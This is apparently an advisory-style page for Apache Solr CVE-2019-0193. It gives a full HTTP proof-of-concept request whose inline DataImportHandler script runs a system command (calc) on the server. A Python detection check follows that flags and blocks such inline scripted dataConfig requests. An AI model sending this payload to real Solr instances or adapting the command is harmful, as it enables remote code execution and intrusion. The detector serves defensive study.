Apache Solr Remote Command Execution CVE-2019-0193

Affected versions: Apache Solr 5.x-8.2.0, in versions where the config API exists.

List all cores: curl http://IP/solr/admin/cores

HTTP request header: POST /solr//dataimport

POC

POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"></dataSource>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" ></entity>
</document>
</dataConfig>
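
A detection check for the request shape shown in the POC, added here as an example (it is not part of the original page or of Solr): it flags requests to a core's dataimport handler that carry their own dataConfig, and marks them for blocking when that configuration contains a script transformer. The function name classify, the verdict labels, the core name core1 and the sample requests are assumptions constructed for illustration, and the sample script body is harmless.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Path of the DataImportHandler endpoint as it appears in the request above
DIH_PATH = re.compile(r"^/solr/[^/]*/dataimport/?$")
# Markers of a script transformer inside a supplied DIH configuration
SCRIPT_MARKERS = re.compile(r"<\s*script\b|transformer\s*=\s*[\"'][^\"']*script:", re.I)

def classify(target, body=""):
    """Return 'ok', 'review' (inline dataConfig) or 'block' (inline script)."""
    url = urlsplit(target)
    if not DIH_PATH.match(url.path):
        return "ok"
    # Parameters may arrive in the query string, the form body, or both.
    params = parse_qs(url.query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    configs = [c for c in params.get("dataConfig", []) if c.strip()]
    if not configs:
        return "ok"        # import driven by the server-side configuration
    if any(SCRIPT_MARKERS.search(c) for c in configs):
        return "block"     # caller supplies code that the import would run
    return "review"        # caller supplies its own configuration, no script seen

# Constructed sample requests (hypothetical core name "core1", harmless script)
INLINE_SCRIPT = ('<dataConfig><script><![CDATA[function f(row){return row;}]]></script>'
                 '<document><entity name="e" transformer="script:f"/></document></dataConfig>')
INLINE_PLAIN = ('<dataConfig><document><entity name="e" '
                'url="http://example.invalid/feed"/></document></dataConfig>')
SAMPLES = [
    ("/solr/core1/dataimport",
     urlencode({"command": "full-import", "debug": "true", "dataConfig": INLINE_SCRIPT})),
    ("/solr/core1/dataimport?"
     + urlencode({"command": "full-import", "debug": "true", "dataConfig": INLINE_PLAIN}), ""),
    ("/solr/core1/dataimport", urlencode({"command": "status"})),
    ("/solr/core1/select?q=dataConfig", ""),
]

def run_samples():
    """Classify every constructed sample, in order."""
    return [classify(target, body) for target, body in SAMPLES]

if __name__ == "__main__":
    for (target, _), verdict in zip(SAMPLES, run_samples()):
        print(verdict, target[:60])
```

The same function can be run over request targets and bodies captured by a reverse proxy or WAF in front of Solr.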